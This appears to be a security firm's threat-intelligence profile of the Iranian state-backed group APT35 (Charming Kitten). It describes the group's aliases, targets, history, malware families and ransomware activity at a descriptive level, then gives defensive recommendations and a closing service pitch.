> threat_actor APT35 —— origin: Iran (IRGC) —— alias: Charming Kitten / Magic Hound / Mint Sandstorm —— active since: 2014<span class="cursor-blink">_</span>_
APT35 — tracked under an unusually long list of aliases including Charming Kitten, Magic Hound, Mint Sandstorm, Phosphorus, TA453, Cobalt Illusion, Newscaster, ITG18, Yellow Garuda, and Educated Manticore — is an Iranian state-sponsored cyber espionage group that has been conducting operations since at least 2014. The group is assessed to operate on behalf of the Islamic Revolutionary Guard Corps (IRGC), conducting long-term, resource-intensive operations to collect strategic intelligence in support of Iranian geopolitical objectives.
APT35 is arguably the most versatile threat actor in Iran's cyber arsenal. While most state-sponsored groups occupy a defined niche — targeting specific sectors or employing specific techniques — APT35 operates across the full spectrum: from patient social engineering campaigns impersonating journalists and academics, to rapid mass exploitation of critical vulnerabilities like ProxyShell and Log4Shell within days of public disclosure, to ransomware deployment using BitLocker and DiskCryptor. This breadth of capability reflects a large, well-resourced operational structure with specialised teams for different functions.
This versatility is confirmed by a remarkable event in late 2025: an anonymous leak of APT35's internal operational documents — published on GitHub under the alias 'KittenBusters' — exposed personnel rosters, daily work logs, attack reports, malware projects, and operational playbooks. The leak, analysed by CloudSEK, Gatewatcher, and other researchers, revealed a disciplined, bureaucratic operation with distinct teams for penetration testing, malware development, social engineering, and infrastructure management. Monthly performance reports documented operators' daily tasks, including social media monitoring, OSINT collection, and phishing infrastructure maintenance.
| Attribute | Detail |
|---|---|
| Tracked Names | APT35 (Mandiant/FireEye), Charming Kitten (ClearSky/CERTFA), Magic Hound (MITRE), Mint Sandstorm (Microsoft, current), Phosphorus (Microsoft, legacy), TA453 (Proofpoint), Cobalt Illusion (Secureworks), Newscaster / Newscaster Team (iSIGHT), ITG18 (IBM X-Force), Yellow Garuda (PwC), Educated Manticore (Check Point), TunnelVision, TEMP.Beanie, Tarh Andishan, Timberworm, UNC788, Agent Serpens |
| State Sponsor | Islamic Republic of Iran — Islamic Revolutionary Guard Corps (IRGC). The IRGC is a military organisation designed to protect the Iranian regime that reports directly to the Supreme Leader. APT35's operations align with IRGC intelligence mandates: monitoring foreign threats, collecting strategic intelligence on adversary nations, and tracking dissidents and regime opponents. |
| Active Since | At least 2014, with precursor activity (Newscaster social media campaign targeting US military) traced to 2011. The Parastoo persona's 2012 hack of an IAEA server was later linked to the group. Continuous operations observed through 2024–2025, including BellaCPP malware deployment and the leaked operational documents. |
| Sanctioned Individuals | Since 2020, portions of the IRGC cyber branch have been sanctioned by the US Department of Treasury's OFAC, including individuals linked to APT35 operations. The leaked 2025 documents identify Abbas Rahrovi (alias Abbas Hosseini) as a reported operational leader. Named individuals include Behzad Mesri (linked to the 2017 HBO breach and IRGC operations) and others identified in US DOJ indictments. |
| Relationship to APT42 | APT35 and APT42 were separated by Mandiant in 2022 as distinct groups. Both are IRGC-affiliated but serve different mandates: APT35 conducts long-term, resource-intensive operations against military, diplomatic, government, and energy targets. APT42 focuses on surveillance of individuals — journalists, academics, dissidents. They share some historical infrastructure but operate independently. |
APT35 primarily targets entities in the United States, United Kingdom, Israel, and Saudi Arabia, but campaigns have reached Germany, Iraq, Australia, South Korea, Kuwait, Turkey, Lebanon, Jordan, Afghanistan, and Iran itself (internal dissidents). Their targeting reflects Iranian strategic priorities: understanding adversary military capability, monitoring nuclear policy, tracking dissident activity, and collecting economic intelligence.
| Sector | Strategic Value | Notable Campaigns |
|---|---|---|
| Government and Military | Foreign policy intelligence, military capability assessment, diplomatic positioning, sanctions planning. Direct intelligence value to IRGC strategic decision-making. | Targeted US and European government personnel. Middle Eastern government agencies including Jordan's Ministry of Justice. Afghan government ministries (Tribal Affairs, Refugees). Saudi and Israeli government entities. Leaked documents reveal ProxyShell exploitation folders for Iran, South Korea, Kuwait, Turkey, Saudi Arabia, and Lebanon. |
| Defence Industrial Base | Weapons systems intelligence, military technology, supply chain information. Supports Iran's domestic military development and understanding of adversary capability. | Sustained targeting of US and Middle Eastern defence organisations. Engineering and business services associated with defence programmes. |
| Energy and Oil & Gas | Iran's economy is oil-dependent. Intelligence on competitor production, pricing strategy, and infrastructure supports economic planning. Energy infrastructure intelligence also supports potential disruptive operations. | Targeting of energy sector organisations across the Middle East and globally. Leaked operational documents confirm energy as a priority targeting sector. |
| Media and Academics | Journalists and researchers covering Iran, nuclear policy, and Middle Eastern affairs shape public narrative and influence Western policy. Their communications reveal sources, analysis, and unpublished intelligence. | 2011 Newscaster campaign targeting US military via fake journalist personas on social media. Ongoing impersonation of academics and think tank researchers. Targeting of entities including the World Health Organization (WHO). |
| Telecommunications | Communications infrastructure provides access to metadata and content. Compromised telecoms support broader surveillance objectives against targeted individuals and organisations. | Afghan telecommunications systems targeted as part of Operation Afghan Infiltration (2021). Telecoms targeting across the Middle East and South Asia. |
| Legal Services and NGOs | Law firms working on Iran-related cases, sanctions enforcement, and human rights documentation hold strategically valuable information. NGOs tracking regime abuses are direct regime opponents. | Operation Desert Breach targeting Jordan's legal sector, with over 74 GB of data exfiltrated and complete system mapping of law firm networks. Western NGO targeting for cloud-based document exfiltration. |
APT35's evolution over the past decade tracks the broader maturation of Iranian cyber capabilities — from unsophisticated social engineering to rapid adoption of critical vulnerability exploits, custom malware development, and even ransomware operations. Understanding this evolution is essential for assessing their current threat level.
| Period | Capability | Significance |
|---|---|---|
| 2011–2014 | Social media manipulation and basic phishing. The Newscaster campaign created elaborate fake personas on Facebook, LinkedIn, and Twitter impersonating journalists and defence analysts to befriend US military personnel and harvest intelligence. Basic spear-phishing against Gmail accounts of Iranian journalists and activists. | Established the social engineering tradecraft that remains APT35's foundation. Demonstrated that human manipulation could bypass all technical controls. Provided a template later refined by APT42. |
| 2015–2017 | Expanded spear-phishing with credential harvesting pages mimicking Google, Yahoo, and Microsoft login portals. Impersonation of journalists from major Western outlets. 2016 Telegram hack compromising approximately 15 million phone numbers. Use of Android malware for mobile surveillance. | Scaled operations significantly. Mobile surveillance capability added. Demonstrated ability to compromise major platforms. |
| 2018–2020 | Development of custom tooling including HYPERSCRAPE for large-scale email extraction. Targeting of COVID-19 vaccine research and pharmaceutical organisations from March 2020. Microsoft seized 99 APT35 domains in 2019, temporarily disrupting infrastructure. | Increased technical sophistication with custom tools. Demonstrated ability to adapt targeting to emerging events (COVID-19). Resilient to infrastructure takedowns — rebuilt and continued. |
| 2021–2022 | Rapid exploitation of ProxyShell (Exchange) and Log4Shell (Log4j) vulnerabilities within days of disclosure. Automated initial access using ProxyShell. Deployment of ransomware using BitLocker and DiskCryptor. PowerLess backdoor and Fast Reverse Proxy (FRP) for persistence and lateral movement. Overlap with TunnelVision activity. | Marked a fundamental shift: from patient social engineering to rapid mass exploitation. Ransomware capability represented either monetisation or destructive/coercive potential. Demonstrated ability to weaponise fresh vulnerabilities at speed. |
| 2023–2025 | BellaCiao malware — a customised dropper where each sample contains hardcoded victim-specific information (company names, subdomains, public IPs). BellaCPP variant rewritten in C++ for enhanced evasion. Exploitation of CVE-2024-1709 (ConnectWise ScreenConnect). Supply-chain pivots through managed service providers. | Current peak capability. Victim-specific malware customisation indicates detailed pre-compromise intelligence gathering. C++ rewrite demonstrates investment in evasion. Supply-chain focus mirrors global trend in sophisticated threat groups. |
| Tool | Type | Capabilities |
|---|---|---|
| BellaCiao / BellaCPP | Custom dropper/loader | Named after the Italian resistance folk song. BellaCiao delivers additional malware payloads based on C2 instructions. Each sample is customised for specific victims with hardcoded company names, subdomains, and IP addresses. Disables Microsoft Defender via PowerShell. Creates persistence through service instances masquerading as legitimate Exchange services. Deploys web shells and IIS backdoors. BellaCPP (2024) is a C++ rewrite enhancing evasion and complexity. |
| PowerLess | Custom PowerShell backdoor | Discovered by Cybereason in 2022. PowerShell-based backdoor providing command execution, file transfer, keylogging, browser credential theft, and screenshot capture. Designed for stealth — operates within PowerShell runtime to avoid dropping executable files to disc. |
| HYPERSCRAPE | Custom email extraction tool | Purpose-built for large-scale, stealthy email exfiltration from compromised webmail accounts. Systematically downloads email content from Gmail, Yahoo, and Microsoft Outlook accounts using stolen credentials. Initially observed targeting Iranian dissidents. |
| GorjolEcho | Custom remote backdoor | Delivered through a multi-stage chain: phishing link → Google Apps Script macro → Dropbox URL → password-protected RAR → dropper using PowerShell and LNK → cloud-hosted stager → GorjolEcho. Capable of receiving and executing operator commands. Delivery chain leverages legitimate cloud services to bypass security controls. |
| Fast Reverse Proxy (FRP) | Open-source tool (repurposed) | Legitimated open-source tool used extensively by APT35 for RDP proxying, enabling remote desktop access to compromised systems through restrictive firewalls. Deployed alongside custom malware for persistent access. |
| BitLocker / DiskCryptor | Legitimate encryption tools (weaponised) | Used for ransomware operations. APT35 exploits ProxyShell to gain access, deploys web shells, then uses BitLocker or the open-source DiskCryptor library to encrypt victim systems. Represents either monetisation, coercion, or destructive capability — intent varies by campaign. |
| Credential Harvesting Infrastructure | Custom phishing platforms | Cloned login pages for Google, Microsoft, Yahoo, and organisation-specific portals. Typosquatted domains mimicking think tanks, media outlets, and conference sites. Real-time MFA token interception. Multi-persona email threads for enhanced social engineering credibility. |
| Android Malware | Custom mobile surveillance | Mobile implants capable of call recording, SMS interception, GPS tracking, and multimedia exfiltration. Delivered via SMS links and masquerading as legitimate VPN applications. Targets Iranian diaspora and dissidents for IRGC domestic surveillance. |
APT35 maintains two fundamentally different initial access strategies, deploying them based on the target's value and the operational timeline. Understanding both is essential for comprehensive defence.
APT35's use of BitLocker and DiskCryptor for ransomware operations — documented from late 2021 onwards — raised questions about whether an espionage group had diversified into financially motivated crime or whether the ransomware served a different purpose. The answer appears to be: both, depending on the campaign.
In some cases, the ransomware activity overlaps with a sub-group tracked as Nemesis Kitten (UNC2448/DEV-0270/COBALT MIRAGE), which Microsoft and others assess may have ties to the IRGC-IO. This sub-group conducted widespread scanning for vulnerabilities and deployed BitLocker for encryption — potentially for financial gain to fund IRGC operations, or as a cover for destructive operations that could be attributed to criminal activity rather than the Iranian state. The Memento ransomware variant also showed TTP overlaps with APT35 infrastructure, though direct attribution remains contested.
For defenders, the operational implication is clear: an APT35 intrusion that begins as espionage may end with ransomware deployment. The same access that enables data exfiltration also enables encryption. Organisations compromised by APT35 face a dual threat — their data may be stolen and their systems may be encrypted, and these outcomes are not mutually exclusive.
APT35's versatility — social engineering, vulnerability exploitation, custom malware, cloud-native operations, ransomware — requires a correspondingly broad defensive posture. No single control addresses the full range of their capabilities.
The relationship between APT35 and APT42 causes persistent confusion in threat intelligence reporting, exacerbated by the fact that both groups share the 'Charming Kitten' label in some vendor taxonomies. Understanding the distinction is operationally important because the two groups pose different threats requiring different defences.
| Attribute | APT35 | APT42 |
|---|---|---|
| Mandate | Long-term, resource-intensive strategic intelligence collection against organisations. Government, military, defence, energy, infrastructure. | Surveillance and monitoring of individuals. Journalists, academics, dissidents, political figures, human rights workers. |
| Initial Access | Dual capability: patient social engineering for high-value targets, rapid vulnerability exploitation for mass access. | Almost exclusively social engineering. Weeks of trust-building before credential harvest. Rarely exploits technical vulnerabilities. |
| Post-Compromise | Network penetration, Active Directory domination, custom malware deployment, lateral movement, data exfiltration, potential ransomware. Infrastructure-focused operations. | Personal account access — email, cloud storage, contacts. Mobile surveillance. Individual-focused collection. Rarely deploys malware beyond credential harvesting. |
| Targets | Organisations: government agencies, defence contractors, energy companies, telecoms, academic institutions. | Individuals: specific people within those organisations, plus journalists, activists, diaspora members, and political campaign staff. |
| Scale | Large campaigns — mass vulnerability exploitation affecting dozens of organisations simultaneously. | Narrow campaigns — typically fewer than a dozen targets per campaign, each approached individually. |
APT35 is one of the most capable and versatile threat groups in the Iranian cyber arsenal. Operating on behalf of the IRGC since at least 2014, they have evolved from social media manipulation campaigns to sophisticated operations spanning targeted social engineering, rapid mass exploitation of critical vulnerabilities, custom malware development, cloud-native espionage, and ransomware deployment. Their target set — government, military, defence, energy, media, legal services, and academia — spans the full range of Iranian strategic intelligence requirements.
The 2025 leak of their internal operational documents confirms what security researchers have long assessed: APT35 is not a loose collection of hackers but a disciplined, bureaucratic operation with distinct functional teams, daily work logs, monthly performance reports, and systematic exploitation of disclosed vulnerabilities. The leaked ProxyShell target folders covering six countries illustrate the scale of their operations.
For organisations in APT35's target sectors, the defensive challenge is the group's breadth. They can compromise you through a carefully crafted phishing email impersonating a journalist, or through automated exploitation of an unpatched Exchange server — and both attack paths lead to the same outcome: persistent access, data exfiltration, and potentially ransomware. Defending requires both human-layer controls (awareness, verification, phishing-resistant MFA) and infrastructure-layer controls (aggressive patching, monitoring, network segmentation). APT35's versatility demands equally versatile defence.
Our threat intelligence assessments evaluate your exposure to specific nation-state threat groups based on your sector, geography, partnerships, and public profile. We identify which groups are most relevant to your risk and recommend targeted, prioritised defences against their documented techniques.